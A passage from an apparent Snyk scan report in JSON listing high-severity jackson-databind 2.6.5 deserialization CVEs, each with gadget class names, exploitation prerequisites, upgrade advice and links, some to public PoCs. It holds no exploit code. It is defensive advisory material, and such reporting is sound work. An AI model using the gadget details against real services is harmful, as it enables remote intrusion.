Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. 
Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3003)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36179) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
The package mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36182) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* 
Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. 
Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36179)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36185) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to 
Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36189) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: 
io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. 
Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36188) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36188)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36181) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* 
Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. 
Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Poc](https://github.com/Al1ex/CVE-2020-36179)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2021-20190) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to 
Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `javax.swing` gadget (specifically `javax.swing.JTextPane`).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. 
When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.7 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2854)\n- [GitHub Release](https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1916633)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "CWE-918", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-12086) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT 
› io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint, the service has the mysql-connector-java jar in the classpath. An attacker can host a crafted MySQL server reachable by the victim and send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs due to missing `com.mysql.cj.jdbc.admin.MiniAdmin` validation.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. 
